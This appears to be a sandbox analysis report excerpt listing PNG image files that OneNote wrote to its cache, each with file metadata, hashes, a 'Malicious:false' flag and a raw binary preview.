                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
